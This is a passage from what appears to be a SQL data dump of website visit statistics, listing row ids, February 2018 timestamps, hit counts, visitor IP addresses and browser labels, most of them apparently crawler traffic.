ther'),(209090,1518867890,1,1,0,0,'207.46.13.171','other'),(209091,1518867968,1,1,0,0,'37.9.113.157','other'),(209092,1518868082,1,1,0,0,'54.36.148.134','other'),(209093,1518868182,1,1,0,0,'54.36.148.167','other'),(209094,1518868184,1,1,0,0,'54.36.148.250','other'),(209095,1518868550,1,1,0,0,'54.36.148.138','other'),(209096,1518868606,1,0,1,0,'66.249.69.143',''),(209097,1518868696,1,1,0,0,'176.31.255.65','other'),(209098,1518868904,2,2,0,0,'54.36.148.130','other'),(209099,1518868928,1,1,0,0,'54.36.149.15','other'),(209100,1518869256,1,1,0,0,'54.36.148.227','other'),(209101,1518869355,1,1,0,0,'54.36.148.228','other'),(209102,1518869363,1,1,0,0,'5.45.207.49','other'),(209103,1518869556,1,1,0,0,'54.36.148.120','other'),(209104,1518869797,1,1,0,0,'94.180.165.111','msie'),(209105,1518869843,1,1,0,0,'54.36.148.252','other'),(209106,1518870018,1,1,0,0,'54.36.149.55','other'),(209107,1518870140,1,1,0,0,'54.36.148.157','other'),(209108,1518870142,1,1,0,0,'141.8.132.19','other'),(209109,1518870537,1,1,0,0,'54.36.149.85','other'),(209110,1518870686,1,0,1,0,'66.249.75.157',''),(209111,1518870717,1,1,0,0,'37.9.113.134','other'),(209112,1518870834,2,2,0,0,'92.113.188.43','chrome'),(209113,1518870944,1,1,0,0,'54.36.148.154','other'),(209114,1518871258,1,1,0,0,'54.36.148.30','other'),(209115,1518871303,1,1,0,0,'54.36.148.212','other'),(209116,1518871307,1,1,0,0,'180.76.15.25','other'),(209117,1518871507,1,1,0,0,'54.36.149.62','other'),(209118,1518871835,1,1,0,0,'54.36.149.103','other'),(209119,1518871925,1,1,0,0,'54.36.149.55','other'),(209120,1518872122,1,1,0,0,'54.36.149.19','other'),(209121,1518872189,1,1,0,0,'178.215.160.229','firefox'),(209122,1518872278,1,1,0,0,'8.29.198.25','other'),(209123,1518872308,1,1,0,0,'54.36.148.201','other'),(209124,1518872340,1,1,0,0,'54.36.148.64','other'),(209125,1518872382,1,1,0,0,'54.36.148.219','other'),(209126,1518872455,1,1,0,0,'54.36.148.213','other'),(209127,1518872549,1,1,0,0,'54.36.148.202','other'),(209128,1518872562,1,1,0,0,'54.36.148.99','other'),(209129,1518872891,1,1,0,0,'54.36.148.251','other'),(209130,1518872967,1,1,0,0,'54.36.148.23','other'),(209131,1518873006,1,1,0,0,'54.36.149.8','other'),(209132,1518873094,1,0,1,0,'66.249.69.143',''),(209133,1518873125,1,1,0,0,'54.36.148.110','other'),(209134,1518873347,1,1,0,0,'54.36.148.187','other'),(209135,1518873450,1,1,0,0,'54.36.148.86','other'),(209136,1518873675,1,1,0,0,'54.36.148.60','other'),(209137,1518873765,1,1,0,0,'54.36.148.98','other'),(209138,1518873977,1,1,0,0,'54.36.148.21','other'),(209139,1518874022,1,1,0,0,'54.36.148.55','other'),(209140,1518874230,1,1,0,0,'91.196.178.35','chrome'),(209141,1518874419,1,1,0,0,'54.36.148.110','other'),(209142,1518874649,1,1,0,0,'217.69.133.224','other'),(209143,1518874793,1,1,0,0,'54.36.149.68','other'),(209144,1518874932,1,1,0,0,'91.209.11.236','other'),(209145,1518874969,1,1,0,0,'54.36.149.106','other'),(209146,1518875042,1,1,0,0,'54.36.149.41','other'),(209147,1518875235,1,1,0,0,'54.36.149.45','other'),(209148,1518875842,1,1,0,0,'54.36.148.149','other'),(209149,1518875870,1,1,0,0,'54.36.149.31','other'),(209150,1518875885,1,1,0,0,'54.36.148.47','other'),(209151,1518875959,1,1,0,0,'40.77.167.48','other'),(209152,1518876037,1,1,0,0,'54.36.148.84','other'),(209153,1518876092,1,1,0,0,'5.45.207.82','other'),(209154,1518876358,1,1,0,0,'54.36.148.152','other'),(209155,1518876390,1,1,0,0,'54.36.148.161','other'),(209156,1518876719,1,1,0,0,'54.36.148.249','other'),(209157,1518876734,1,1,0,0,'54.36.148.147','other'),(209158,1518876893,1,1,0,0,'54.36.148.21','other'),(209159,1518876942,1,1,0,0,'54.36.148.234','other'),(209160,1518877036,1,1,0,0,'54.36.148.112','other'),(209161,1518877193,1,1,0,0,'91.209.11.236','other'),(209162,1518877304,1,1,0,0,'54.36.148.97','other'),(209163,1518877432,1,1,0,0,'54.36.149.65','other'),(209164,1518877484,1,1,0,0,'37.9.113.182','other'),(209165,1518877494,1,1,0,0,'54.36.148.134','other'),(209166,1518877674,1,1,0,0,'54.36.148.17','other'),(209167,1518878159,1,1,0,0,'54.36.148.203','other'),(209168,1518878270,1,1,0,0,'54.36.148.200','other'),(209169,1518878430,1,1,0,0,'54.36.148.27','other'),(209170,1518878608,1,1,0,0,'54.36.149.62','other'),(209171,1518878733,1,1,0,0,'54.36.148.143','other'),(209172,1518878816,1,1,0,0,'54.36.148.89','other'),(209173,1518879022,1,1,0,0,'54.36.149.71','other'),(209174,1518879110,1,1,0,0,'54.36.149.55','other'),(209175,1518879382,1,1,0,0,'54.36.148.165','other'),(209176,1518879584,1,1,0,0,'195.184.211.34','firefox'),(209177,1518879689,1,1,0,0,'54.36.148.54','other'),(209178,1518880269,1,1,0,0,'40.77.167.48','other'),(209179,1518880346,1,1,0,0,'54.36.148.55','other'),(209180,1518880454,1,1,0,0,'54.36.148.245','other'),(209181,1518880504,1,1,0,0,'54.36.148.204','other'),(209182,1518880638,1,1,0,0,'54.36.148.201','other'),(209183,1518880648,1,1,0,0,'54.36.148.165','other'),(209184,1518880947,1,1,0,0,'54.36.149.80','other'),(209185,1518881125,1,1,0,0,'54.36.148.146','other'),(209186,1518881185,1,1,0,0,'54.36.149.53','other'),(209187,1518881417,1,1,0,0,'178.154.171.88','other'),(209188,1518881446,1,1,0,0,'54.36.148.45','other'),(209189,1518881721,1,1,0,0,'54.36.148.186','other'),(209190,1518882009,1,1,0,0,'54.36.148.200','other'),(209191,1518882160,1,1,0,0,'54.36.149.59','other'),(209192,1518882421,1,1,0,0,'217.69.133.221','other'),(209193,1518882422,2,2,0,0,'199.58.86.211','other'),(209194,1518882550,1,1,0,0,'54.36.148.66','other'),(209195,1518882600,1,1,0,0,'54.36.149.85','other'),(209196,1518882737,1,1,0,0,'54.36.148.230','other'),(209197,1518882748,1,1,0,0,'54.36.149.96','other'),(209198,1518882768,1,1,0,0,'217.69.133.252','other'),(209199,1518882801,1,1,0,0,'185.181.39.133','firefox'),(209200,1518883114,1,1,0,0,'8.29.198.25','other'),(209201,1518883481,1,1,0,0,'180.76.15.148','other'),(209202,1518883530,1,0,1,0,'66.249.69.143',''),(209203,1518883813,1,1,0,0,'54.36.148.156','other'),(209204,1518884046,1,1,0,0,'54.36.148.197','other'),(209205,1518884071,1,1,0,0,'54.36.148.254','other'),(209206,1518884087,1,1,0,0,'54.36.148.78','other'),(209207,1518884311,1,1,0,0,'54.36.149.87','other'),(209208,1518884437,1,1,0,0,'188.32.176.159','chrome'),(209209,1518884476,1,1,0,0,'54.36.149.14','other'),(209210,1518884539,1,1,0,0,'54.36.148.192','other'),(209211,1518884714,1,1,0,0,'54.36.148.128','other'),(209212,1518884896,1,1,0,0,'178.154.171.55','other'),(209213,1518884898,1,1,0,0,'54.36.149.62','other'),(209214,1518885002,1,1,0,0,'54.36.148.106','other'),(209215,1518885080,1,1,0,0,'54.36.148.112','other'),(209216,1518885204,1,1,0,0,'54.36.148.99','other'),(209217,1518885557,1,1,0,0,'217.69.133.15','other'),(209218,1518885590,1,1,0,0,'54.36.148.127','other'),(209219,1518885636,1,1,0,0,'54.36.149.60','other'),(209220,1518885687,1,1,0,0,'54.36.148.21','other'),(209221,1518885786,1,1,0,0,'37.73.214.98','chrome'),(209222,1518885788,1,1,0,0,'54.36.149.92','other'),(209223,1518885831,1,1,0,0,'54.36.148.34','other'),(209224,1518885888,1,1,0,0,'194.44.227.247','chrome'),(209225,1518885976,1,1,0,0,'54.36.148.92','other'),(209226,1518886088,1,1,0,0,'54.36.148.246','other'),(209227,1518886124,1,1,0,0,'54.36.149.80','other'),(209228,1518886185,1,1,0,0,'54.36.149.99','other'),(209229,1518886323,1,1,0,0,'54.36.148.174','other'),(209230,1518886792,1,1,0,0,'66.249.69.145','chrome'),(209231,1518886958,1,1,0,0,'54.36.148.26','other'),(209232,1518887116,1,1,0,0,'54.36.149.19','other'),(209233,1518887166,1,0,1,0,'66.249.75.155',''),(209234,1518887573,1,1,0,0,'54.36.148.32','other'),(209235,1518887655,1,1,0,0,'54.36.148.176','other'),(209236,1518888345,1,1,0,0,'54.36.148.90','other'),(209237,1518888474,1,1,0,0,'54.36.148.92','other'),(209238,1518888687,1,1,0,0,'54.36.149.84','other'),(209239,1518888865,1,1,0,0,'217.69.133.222','other'),(209240,1518888985,1,1,0,0,'54.36.148.186','other'),(209241,1518889147,1,1,0,0,'54.36.148.80','other'),(209242,1518889152,1,1,0,0,'54.36.148.95','other'),(209243,1518889257,1,1,0,0,'54.36.148.23','other'),(209244,1518889364,1,1,0,0,'54.36.148.110','other'),(209245,1518889419,1,1,0,0,'54.36.149.56','other'),(209246,1518889608,1,1,0,0,'54.36.148.88','other'),(209247,1518889861,1,1,0,0,'54.36.148.250','other'),(209248,1518889892,1,1,0,0,'54.36.148.89','other'),(209249,1518890065,1,1,0,0,'54.36.148.16','other'),(209250,1518890103,1,1,0,0,'54.36.148.33','other'),(209251,1518890105,1,1,0,0,'54.36.148.70','other'),(209252,1518890228,1,1,0,0,'178.154.200.7','other'),(209253,1518890378,1,1,0,0,'54.36.148.121','other'),(209254,1518890486,1,1,0,0,'54.36.149.28','other'),(209255,1518890700,1,1,0,0,'54.87.209.149','other'),(209256,1518890875,1,1,0,0,'54.36.148.170','other'),(209257,1518891051,1,1,0,0,'54.36.149.62','other'),(209258,1518891065,1,1,0,0,'54.36.149.68','other'),(209259,1518891445,1,1,0,0,'54.36.149.99','other'),(209260,1518892012,1,1,0,0,'54.36.148.124','other'),(209261,1518892327,1,1,0,0,'37.9.113.100','other'),(209262,1518892390,2,2,0,0,'136.243.73.76','other'),(209263,1518892432,1,1,0,0,'54.36.149.31','other'),(209264,1518892788,1,1,0,0,'54.36.148.151','other'),(209265,1518892890,1,1,0,0,'54.36.148.65','other'),(209266,1518892939,1,1,0,0,'54.36.149.39','other'),(209267,1518893166,1,1,0,0,'54.36.148.68','other'),(209268,1518893408,1,1,0,0,'54.36.148.120','other'),(209269,1518893697,1,1,0,0,'54.36.148.100','other'),(209270,1518893817,1,1,0,0,'54.36.148.220','other'),(209271,1518893893,1,1,0,0,'54.36.148.117','other'),(209272,1518893977,1,1,0,0,'8.29.198.26','other'),(209273,1518894085,1,1,0,0,'178.154.200.7','other'),(209274,1518894239,1,1,0,0,'54.36.148.144','other'),(209275,1518894264,1,1,0,0,'54.36.148.177','other'),(209276,1518894350,1,1,0,0,'54.36.148.18','other'),(209277,1518894358,1,1,0,0,'54.36.148.10','other'),(209278,1518894409,1,1,0,0,'54.36.148.233','other'),(209279,1518894424,1,1,0,0,'54.36.149.103','other'),(209280,1518894620,1,1,0,0,'54.36.148.34','other'),(209281,1518894832,1,1,0,0,'54.36.148.142','other'),(209282,1518895145,1,1,0,0,'54.36.148.153','other'),(209283,1518895331,1,1,0,0,'54.36.148.226','other'),(209284,1518895342,1,1,0,0,'217.69.133.84','other'),(209285,1518895499,1,1,0,0,'54.36.148.209','other'),(209286,1518895798,1,1,0,0,'54.87.209.149','other'),(209287,1518895999,1,1,0,0,'54.36.148.118','other'),(209288,1518896100,1,1,0,0,'40.77.167.48','other'),(209289,1518896147,1,1,0,0,'54.36.148.32','other'),(209290,1518896344,1,1,0,0,'54.36.149.45','other'),(209291,1518896497,1,1,0,0,'54.36.148.94','other'),(209292,1518896516,1,1,0,0,'54.36.148.113','other'),(209293,1518896655,1,1,0,0,'54.36.149.70','other'),(209294,1518896720,1,1,0,0,'54.87.209.149','other'),(209295,1518896856,1,1,0,0,'141.8.142.74','other'),(209296,1518896897,1,1,0,0,'54.36.148.208','other'),(209297,1518897205,1,1,0,0,'54.36.148.223','other'),(209298,1518897297,1,1,0,0,'54.36.149.47','other'),(209300,1518897466,1,1,0,0,'54.36.149.10','other'),(209301,1518897625,1,1,0,0,'54.87.209.149','other'),(209302,1518897656,1,1,0,0,'54.36.149.78','other'),(209303,1518897806,1,1,0,0,'54.36.148.96','other'),(209304,1518897935,1,1,0,0,'91.209.11.236','other'),(209305,1518898292,1,1,0,0,'54.36.148.139','other'),(209306,1518898321,1,1,0,0,'54.36.149.23','other'),(209307,1518898781,1,1,0,0,'54.36.149.77','other'),(209308,1518898797,1,1,0,0,'54.36.148.101','other'),(209309,1518899051,1,1,0,0,'207.46.13.147','other'),(209310,1518899121,1,1,0,0,'217.69.133.227','other'),(209311,1518899171,1,1,0,0,'54.36.148.172','other'),(209312,1518899410,1,1,0,0,'54.36.149.103','other'),(209313,1518899437,1,1,0,0,'54.36.149.36','other'),(209314,1518899878,1,1,0,0,'141.8.142.74','other'),(209315,1518900825,1,1,0,0,'54.36.149.70','other'),(209316,1518900946,1,1,0,0,'54.36.149.97','other'),(209317,1518901006,1,1,0,0,'54.36.148.121','other'),(209318,1518901692,1,1,0,0,'37.9.113.182','other'),(209319,1518902193,1,1,0,0,'54.36.148.101','other'),(209320,1518902288,1,1,0,0,'54.36.148.77','other'),(209321,1518902323,1,1,0,0,'54.36.148.95','other'),(209322,1518902504,1,1,0,0,'54.36.149.24','other'),(209323,1518902776,1,1,0,0,'54.36.148.239','other'),(209324,1518902806,1,1,0,0,'91.196.178.43','other'),(209325,1518902961,1,1,0,0,'54.36.148.131','other'),(209326,1518903032,1,1,0,0,'54.36.149.43','other'),(209327,1518903232,1,1,0,0,'54.36.148.89','other'),(209328,1518903547,1,1,0,0,'54.36.148.95','other'),(209329,1518903868,1,1,0,0,'54.36.148.149','other'),(209330,1518903983,1,1,0,0,'54.36.149.74','other'),(209331,1518904005,1,1,0,0,'54.36.148.88','other'),(209332,1518904040,1,1,0,0,'54.36.148.251','other'),(209333,1518904110,1,1,0,0,'54.36.148.28','other'),(209334,1518904486,1,1,0,0,'54.36.149.22','other'),(209335,1518904584,1,1,0,0,'54.36.148.142','other'),(209336,1518904816,1,1,0,0,'8.29.198.25','other'),(209337,1518905114,1,1,0,0,'54.36.148.29','other'),(209338,1518905159,1,1,0,0,'207.46.13.147','other'),(209339,1518905408,1,1,0,0,'217.69.133.215','other'),(209340,1518905464,1,1,0,0,'54.36.148.206','other'),(209341,1518905536,2,2,0,0,'54.36.148.247','other'),(209342,1518905551,1,1,0,0,'54.36.149.36','other'),(209343,1518905794,1,1,0,0,'40.77.167.75','other'),(209344,1518905963,1,1,0,0,'217.69.136.207','other'),(209345,1518906109,1,1,0,0,'54.36.148.119','other'),(209346,1518906183,1,1,0,0,'54.36.148.166','other'),(209347,1518906335,1,0,1,0,'66.249.64.217',''),(209348,1518906384,1,1,0,0,'54.36.148.49','other'),(209349,1518906385,1,1,0,0,'54.36.149.79','other'),(209350,1518908201,1,1,0,0,'23.94.32.176','other'),(209351,1518909153,1,1,0,0,'54.36.148.43','other'),(209352,1518909236,1,1,0,0,'54.36.148.176','other'),(209353,1518909244,1,1,0,0,'54.36.149.83','other'),(209354,1518909303,1,1,0,0,'54.36.149.82','other'),(209355,1518909395,1,1,0,0,'54.36.148.122','other'),(209356,1518909401,1,1,0,0,'54.36.149.49','other'),(209357,1518909565,1,1,0,0,'193.106.30.99','firefox'),(209358,1518909836,2,2,0,0,'66.249.64.30','chrome'),(209359,1518909921,1,1,0,0,'217.69.133.221','other'),(209360,1518909969,1,1,0,0,'54.36.148.66','other'),(209361,1518910535,1,1,0,0,'54.36.148.69','other'),(209362,1518910707,1,0,1,0,'66.249.64.28',''),(209363,1518910802,1,1,0,0,'141.8.132.19','other'),(209364,1518911073,1,1,0,0,'54.36.148.11','other'),(209365,1518911242,1,1,0,0,'54.36.148.103','other'),(209366,1518912247,1,1,0,0,'91.209.11.236','other'),(209367,1518912491,1,1,0,0,'54.36.149.4','other'),(209368,1518912590,1,1,0,0,'54.36.149.12','other'),(209369,1518912839,1,1,0,0,'54.36.149.95','other'),(209370,1518912855,1,1,0,0,'54.36.148.201','other'),(209371,1518913021,1,1,0,0,'54.36.148.208','other'),(209372,1518913053,1,1,0,0,'54.36.149.57','other'),(209373,1518913206,1,1,0,0,'54.36.148.218','other'),(209374,1518913603,1,1,0,0,'66.249.64.221','chrome'),(209375,1518913859,1,1,0,0,'54.36.148.73','other'),(209376,1518914074,1,1,0,0,'54.36.148.220','other'),(209377,1518914183,1,1,0,0,'54.36.149.22','other'),(209378,1518914246,1,1,0,0,'54.36.149.42','other'),(209379,1518914449,1,1,0,0,'54.36.148.186','other'),(209380,1518914525,1,1,0,0,'54.36.149.64','other'),(209381,1518914766,1,1,0,0,'54.36.148.160','other'),(209382,1518914791,1,1,0,0,'54.36.149.12','other'),(209383,1518914994,1,1,0,0,'54.36.148.65','other'),(209384,1518915315,1,1,0,0,'54.36.148.14','other'),(209385,1518915320,1,1,0,0,'54.36.149.52','other'),(209386,1518915645,2,2,0,0,'37.9.113.114','other'),(209387,1518915657,1,1,0,0,'8.29.198.27','other'),(209388,1518915900,1,0,1,0,'66.249.64.29',''),(209389,1518916044,1,1,0,0,'54.36.149.38','other'),(209390,1518916047,1,1,0,0,'54.36.148.224','other'),(209391,1518916202,1,1,0,0,'54.36.148.124','other'),(209392,1518916303,1,1,0,0,'54.36.148.213','other'),(209393,1518916920,1,1,0,0,'54.36.148.146','other'),(209394,1518917003,1,1,0,0,'66.249.64.29','chrome'),(209395,1518917026,1,1,0,0,'54.36.148.176','other'),(209396,1518917184,1,1,0,0,'54.36.148.131','other'),(209397,1518917206,1,1,0,0,'54.36.148.139','other'),(209398,1518917351,1,1,0,0,'54.36.149.21','other'),(209399,1518917392,1,1,0,0,'54.36.148.101','other'),(209400,1518917499,1,1,0,0,'54.36.149.4','other'),(209401,1518917851,1,1,0,0,'141.8.142.74','other'),(209402,1518917972,1,1,0,0,'54.36.148.233','other'),(209403,1518918089,1,1,0,0,'54.36.148.211','other'),(209404,1518918109,1,1,0,0,'54.36.149.22','other'),(209405,1518918172,1,1,0,0,'54.36.148.13','other'),(209406,1518918197,1,1,0,0,'54.36.148.49','other'),(209407,1518918226,1,1,0,0,'54.36.148.67','other'),(209408,1518918304,1,1,0,0,'54.36.148.52','other'),(209409,1518918654,1,1,0,0,'91.209.11.236','other'),(209410,1518918685,1,1,0,0,'54.36.148.88','other'),(209411,1518919011,1,1,0,0,'54.36.148.203','other'),(209412,1518919023,1,1,0,0,'54.36.149.11','other'),(209413,1518919470,2,2,0,0,'54.36.149.106','other'),(209414,1518919569,1,0,1,0,'66.249.64.29',''),(209415,1518919786,2,2,0,0,'54.36.149.4','other'),(209416,1518919935,1,1,0,0,'54.36.148.66','other'),(209417,1518920012,1,1,0,0,'54.36.148.45','other'),(209418,1518920292,1,1,0,0,'54.36.148.123','other'),(209419,1518920477,1,1,0,0,'54.36.149.1','other'),(209420,1518920591,1,1,0,0,'54.36.149.69','other'),(209421,1518920777,1,1,0,0,'54.36.149.19','other'),(209422,1518920813,1,1,0,0,'54.36.148.75','other'),(209423,1518921236,1,1,0,0,'54.36.149.55','other'),(209424,1518921341,1,1,0,0,'54.36.148.239','other'),(209425,1518921365,1,1,0,0,'54.87.209.149','other'),(209426,1518921614,1,1,0,0,'207.46.13.147','other'),(209427,1518921677,1,1,0,0,'54.36.148.212','other'),(209428,1518921744,1,1,0,0,'217.69.136.207','other'),(209429,1518921985,1,1,0,0,'54.36.148.180','other'),(209430,1518922245,1,1,0,0,'54.36.148.239','other'),(209431,1518922290,1,1,0,0,'54.87.209.149','other'),(209432,1518922478,1,1,0,0,'54.36.148.187','other'),(209433,1518922674,1,1,0,0,'54.36.148.66','other'),(209434,1518923042,1,1,0,0,'54.36.148.130','other'),(209435,1518923233,1,1,0,0,'54.87.209.149','other'),(209436,1518923256,1,1,0,0,'54.36.148.241','other'),(209437,1518923738,1,1,0,0,'54.36.148.105','other'),(209438,1518923944,1,1,0,0,'91.209.11.236','other'),(209439,1518924112,1,1,0,0,'54.36.149.7','other'),(209440,1518924136,1,1,0,0,'54.36.148.195','other'),(209441,1518924150,1,1,0,0,'54.87.209.149','other'),(209442,1518924376,1,1,0,0,'54.36.148.70','other'),(209443,1518924520,1,1,0,0,'141.8.132.22','other'),(209444,1518924582,1,1,0,0,'54.36.149.102','other'),(209445,1518924922,1,1,0,0,'54.36.149.4','other'),(209446,1518925062,1,1,0,0,'54.87.209.149','other'),(209447,1518925229,1,1,0,0,'54.36.149.60','other'),(209448,1518925473,1,1,0,0,'54.36.149.24','other'),(209449,1518925543,1,1,0,0,'54.36.149.73','other'),(209450,1518925723,1,1,0,0,'40.77.167.48','other'),(209451,1518925934,1,1,0,0,'54.36.149.37','other'),(209452,1518925973,1,1,0,0,'54.87.209.149','other'),(209453,1518926093,1,1,0,0,'54.36.148.184','other'),(209454,1518926103,1,1,0,0,'54.36.148.120','other'),(209455,1518926151,1,1,0,0,'54.36.148.136','other'),(209456,1518926430,1,1,0,0,'54.36.148.48','other'),(209457,1518926487,1,1,0,0,'54.36.148.196','other'),(209458,1518926500,1,1,0,0,'8.29.198.26','other'),(209459,1518926666,1,0,1,0,'66.249.64.28',''),(209460,1518926840,1,1,0,0,'54.36.148.77','other'),(209461,1518926881,1,1,0,0,'54.87.209.149','other'),(209462,1518926886,1,1,0,0,'54.36.148.26','other'),(209463,1518926899,1,1,0,0,'54.36.149.0','other'),(209464,1518927083,1,1,0,0,'54.36.149.68','other'),(209465,1518927136,1,1,0,0,'54.36.148.145','other'),(209466,1518927175,1,1,0,0,'54.36.149.19','other'),(209467,1518927243,1,1,0,0,'54.36.148.20','other'),(209468,1518927590,1,1,0,0,'54.36.148.196','other'),(209469,1518927668,1,1,0,0,'54.36.148.252','other'),(209470,1518927789,1,1,0,0,'54.87.209.149','other'),(209471,1518928056,1,1,0,0,'54.36.148.25','other'),(209472,1518928073,1,1,0,0,'54.36.148.52','other'),(209473,1518928226,1,1,0,0,'54.36.148.176','other'),(209474,1518928260,1,1,0,0,'54.36.148.187','other'),(209475,1518928322,1,1,0,0,'54.36.149.33','other'),(209476,1518928349,1,1,0,0,'54.36.148.137','other'),(209477,1518928596,1,1,0,0,'54.36.148.124','other'),(209478,1518928706,1,1,0,0,'54.87.209.149','other'),(209479,1518928729,1,1,0,0,'37.9.113.132','other'),(209480,1518928911,1,1,0,0,'54.36.148.169','other'),(209481,1518928947,1,1,0,0,'54.36.149.17','other'),(209482,1518929130,1,1,0,0,'54.36.148.170','other'),(209483,1518929148,1,1,0,0,'54.36.148.41','other'),(209484,1518929610,1,1,0,0,'54.36.148.188','other'),(209485,1518929654,1,1,0,0,'54.87.209.149','other'),(209486,1518929963,1,1,0,0,'54.36.148.143','other'),(209487,1518930241,1,1,0,0,'54.36.148.30','other'),(209488,1518930247,1,1,0,0,'54.36.148.226','other'),(209489,1518930393,1,1,0,0,'54.36.148.19','other'),(209490,1518930561,1,1,0,0,'54.87.209.149','other'),(209491,1518930851,1,1,0,0,'54.36.148.107','other'),(209492,1518931091,1,1,0,0,'54.36.149.18','other'),(209493,1518931450,1,1,0,0,'54.36.148.187','other'),(209494,1518931474,1,1,0,0,'54.87.209.149','other'),(209495,1518931489,1,1,0,0,'54.36.148.97','other'),(209496,1518931579,1,1,0,0,'178.154.171.55','other'),(209497,1518931738,1,1,0,0,'54.36.148.133','other'),(209498,1518932324,1,1,0,0,'217.69.133.226','other'),(209499,1518932402,1,1,0,0,'54.87.209.149','other'),(209500,1518932961,1,1,0,0,'54.36.148.167','other'),(209501,1518933079,1,1,0,0,'180.76.15.27','other'),(209502,1518933113,1,1,0,0,'188.32.247.248','chrome'),(209503,1518933312,1,1,0,0,'54.87.209.149','other'),(209504,1518933321,2,2,0,0,'54.36.149.49','other'),(209505,1518933345,1,1,0,0,'54.36.148.120','other'),(209506,1518933502,1,1,0,0,'54.36.148.219','other'),(209507,1518934221,1,1,0,0,'54.87.209.149','other'),(209508,1518934748,1,1,0,0,'54.36.148.131','other'),(209509,1518934764,1,1,0,0,'91.209.11.236','other'),(209510,1518934975,1,1,0,0,'54.36.149.32','other'),(209511,1518935248,1,1,0,0,'54.87.209.149','other'),(209512,1518935835,1,1,0,0,'54.36.148.184','other'),(209513,1518935902,1,1,0,0,'54.36.148.60','other'),(209514,1518936035,1,1,0,0,'54.36.149.104','other'),(209515,1518936055,1,1,0,0,'54.36.148.125','other'),(209516,1518936153,1,1,0,0,'54.87.209.149','other'),(209517,1518936161,1,1,0,0,'37.9.113.157','other'),(209518,1518936216,1,1,0,0,'54.36.148.120','other'),(209519,1518936755,1,1,0,0,'217.69.133.216','other'),(209520,1518936889,1,1,0,0,'54.36.148.231','other'),(209521,1518936953,1,1,0,0,'54.36.149.26','other'),(209522,1518937099,1,1,0,0,'54.87.209.149','other'),(209523,1518937334,1,1,0,0,'8.29.198.27','other'),(209524,1518937784,1,1,0,0,'54.36.148.85','other'),(209525,1518937791,1,1,0,0,'91.196.178.164','chrome'),(209526,1518938016,1,1,0,0,'54.87.209.149','other'),(209527,1518938149,1,1,0,0,'54.36.149.74','other'),(209528,1518938420,1,1,0,0,'54.36.148.125','other'),(209529,1518938556,1,1,0,0,'54.36.148.116','other'),(209530,1518938653,1,1,0,0,'54.36.148.47','other'),(209531,1518938968,1,1,0,0,'54.87.209.149','other'),(209532,1518939027,1,1,0,0,'217.69.133.223','other'),(209533,1518939136,7,7,0,0,'62.210.157.129','other'),(209534,1518939435,1,1,0,0,'54.36.149.83','other'),(209535,1518939540,1,1,0,0,'91.196.178.130','chrome'),(209536,1518939670,1,1,0,0,'40.77.167.48','other'),(209537,1518939725,1,1,0,0,'54.36.149.58','other'),(209538,1518939728,1,1,0,0,'54.36.148.135','other'),(209539,1518939903,1,1,0,0,'54.87.209.149','other'),(209540,1518940206,1,1,0,0,'54.36.148.142','other'),(209541,1518940368,1,1,0,0,'54.36.148.180','other'),(209542,1518940466,1,1,0,0,'54.36.148.87','other'),(209543,1518940805,1,1,0,0,'54.87.209.149','other'),(209544,1518940827,1,1,0,0,'54.36.149.2','other'),(209545,1518941201,1,1,0,0,'37.9.113.132','other'),(209546,1518941336,1,0,1,0,'66.249.64.29',''),(209547,1518941494,1,1,0,0,'54.36.148.199','other'),(209548,1518941605,1,1,0,0,'217.69.133.215','other'),(209549,1518941724,1,1,0,0,'54.87.209.149','other'),(209550,1518941965,1,1,0,0,'54.36.148.114','other'),(209551,1518942237,2,2,0,0,'54.36.149.6','other'),(209552,1518942361,1,0,1,0,'66.249.64.29',''),(209553,1518942642,1,1,0,0,'54.87.209.149','other'),(209554,1518943295,1,1,0,0,'54.36.149.35','other'),(209555,1518943401,1,1,0,0,'54.36.149.19','other'),(209556,1518943490,1,1,0,0,'54.36.148.102','other'),(209557,1518943814,1,1,0,0,'54.36.149.73','other'),(209558,1518943847,1,1,0,0,'54.36.148.63','other'),(209559,1518944192,1,1,0,0,'54.36.148.124','other'),(209560,1518944993,1,1,0,0,'54.36.148.236','other'),(209561,1518945054,1,1,0,0,'54.36.148.62','other'),(209562,1518945497,1,1,0,0,'54.36.148.21','other'),(209563,1518945617,1,1,0,0,'95.132.50.23','firefox'),(209564,1518945938,1,1,0,0,'54.36.148.230','other'),(209565,1518946119,1,1,0,0,'54.36.149.96','other'),(209566,1518946197,1,1,0,0,'54.36.148.106','other'),(209567,1518946243,1,1,0,0,'94.178.6.123','firefox'),(209568,1518946328,1,1,0,0,'54.36.148.131','other'),(209569,1518946387,1,1,0,0,'54.36.148.27','other'),(209570,1518946409,1,1,0,0,'54.36.148.22','other'),(209571,1518946425,1,1,0,0,'54.36.148.229','other'),(209572,1518946487,1,1,0,0,'54.36.149.62','other'),(209573,1518946669,1,1,0,0,'54.36.148.250','other'),(209574,1518946859,1,0,1,0,'66.249.64.29',''),(209575,1518946934,1,1,0,0,'54.36.148.200','other'),(209576,1518947248,1,1,0,0,'54.36.148.31','other'),(209577,1518947312,1,1,0,0,'54.36.148.232','other'),(209578,1518948171,1,1,0,0,'8.29.198.25','other'),(209579,1518948587,1,1,0,0,'54.36.149.101','other'),(209580,1518948633,1,1,0,0,'54.36.149.84','other'),(209581,1518948900,1,1,0,0,'54.36.148.26','other'),(209582,1518948910,1,1,0,0,'54.36.148.80','other'),(209583,1518948911,1,0,1,0,'66.249.66.157',''),(209584,1518949210,1,1,0,0,'54.36.148.252','other'),(209585,1518949318,1,1,0,0,'54.36.149.17','other'),(209586,1518949673,1,1,0,0,'54.36.149.75','other'),(209587,1518949676,1,1,0,0,'54.36.148.205','other'),(209588,1518949986,2,0,2,0,'66.249.66.156',''),(209589,1518950085,1,1,0,0,'54.36.148.130','other'),(209590,1518950158,1,1,0,0,'54.36.148.52','other'),(209591,1518950326,1,1,0,0,'82.145.222.3','chrome'),(209592,1518950333,1,1,0,0,'54.36.149.61','other'),(209593,1518950342,1,1,0,0,'54.36.148.230','other'),(209594,1518950419,1,1,0,0,'82.145.221.62','chrome'),(209595,1518950617,1,1,0,0,'54.36.149.1','other'),(209596,1518950916,1,1,0,0,'54.36.149.16','other'),(209597,1518951109,1,1,0,0,'54.36.149.68','other'),(209598,1518951245,1,1,0,0,'54.36.148.169','other'),(209599,1518951301,1,1,0,0,'54.36.149.58','other'),(209600,1518951337,1,1,0,0,'54.36.148.137','other'),(209601,1518951416,1,1,0,0,'91.196.178.55','chrome'),(209602,1518951563,1,1,0,0,'54.36.148.81','other'),(209603,1518951941,1,1,0,0,'157.55.39.152','other'),(209604,1518952036,1,1,0,0,'54.36.148.182','other'),(209605,1518952132,1,1,0,0,'54.36.148.39','other'),(209606,1518952266,1,0,1,0,'66.249.66.156',''),(209607,151